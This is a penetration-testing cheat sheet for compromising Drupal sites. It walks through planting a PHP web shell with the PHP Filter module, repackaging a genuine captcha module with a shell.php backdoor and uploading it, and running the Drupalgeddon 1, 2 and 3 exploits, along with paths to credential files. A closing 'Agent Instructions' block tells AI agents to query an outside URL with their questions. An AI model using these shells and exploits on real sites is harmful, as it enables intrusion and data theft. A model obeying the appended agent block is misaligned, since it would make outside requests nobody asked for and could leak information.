# Drupal

## Discovery

```bash
# Meta tag
curl -s http://TARGET | grep 'Generator.*Drupal'

# CHANGELOG.txt (version)
curl -s http://TARGET/CHANGELOG.txt | head

# Node-based URLs (common indicator)
/node/1
/node/2

# Login page
/user/login
```

***

## Enumeration Tools

### droopescan

```bash
# Install
pip install droopescan

# Scan
droopescan scan drupal -u http://TARGET
```

***

## PHP Filter Module RCE (Drupal < 8)

1. Login as admin
2. Enable PHP Filter: `Modules → PHP Filter → Save`
3. Create content: `Content → Add content → Basic page`
4. Add PHP shell in body:

```php
<?php system($_GET['cmd']); ?>
```

5. Set `Text format` to `PHP code`
6. Save and access:

```bash
curl http://TARGET/node/3?cmd=id
```

***

## PHP Filter Module (Drupal 8+)

Module not installed by default. Upload manually:

```bash
# Download module
wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

# Upload via: Administration → Reports → Available updates
# Then enable and use as above
```

***

## Backdoored Module Upload

### Create Malicious Module

```bash
# Download legit module
wget https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

# Create shell.php
echo '<?php system($_GET["cmd"]); ?>' > captcha/shell.php

# Create .htaccess (bypass /modules protection)
cat > captcha/.htaccess << 'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
EOF

# Repackage
tar cvf captcha.tar.gz captcha/
```

### Upload and Execute

1. `Manage → Extend → + Install new module`
2. Upload `captcha.tar.gz`
3. Access shell:

```bash
curl http://TARGET/modules/captcha/shell.php?cmd=id
```

***

## Drupalgeddon (CVE-2014-3704)

**Affects:** Drupal 7.0 - 7.31

Pre-auth SQLi to create admin user:

```bash
# Exploit
python2.7 drupalgeddon.py -t http://TARGET -u hacker -p hacker

# Then login and enable PHP Filter for RCE
```

**PoC:** <https://www.exploit-db.com/exploits/34992>

***

## Drupalgeddon2 (CVE-2018-7600)

**Affects:** Drupal < 7.58, < 8.5.1

Unauthenticated RCE:

```bash
# Ruby exploit
ruby drupalgeddon2.rb http://TARGET

# Python exploit
python3 drupalgeddon2.py http://TARGET -c 'id'
```

**PoC:** <https://github.com/dreadlocked/Drupalgeddon2>

***

## Drupalgeddon3 (CVE-2018-7602)

**Affects:** Drupal 7.x, 8.x

Authenticated RCE (requires any user account):

```bash
python3 drupalgeddon3.py http://TARGET username password 'id'
```

***

## Important Paths

| Path                          | Description       |
| ----------------------------- | ----------------- |
| `/sites/default/settings.php` | DB credentials    |
| `/sites/default/files/`       | Uploaded files    |
| `/modules/`                   | Modules directory |
| `/CHANGELOG.txt`              | Version info      |
| `/user/login`                 | Login page        |
| `/admin`                      | Admin panel       |

***

## Config File Location

```bash
# Database credentials
/sites/default/settings.php

# Contains:
$databases['default']['default'] = array(
  'database' => 'drupal',
  'username' => 'drupaluser',
  'password' => 'password123',
);
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/drupal.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.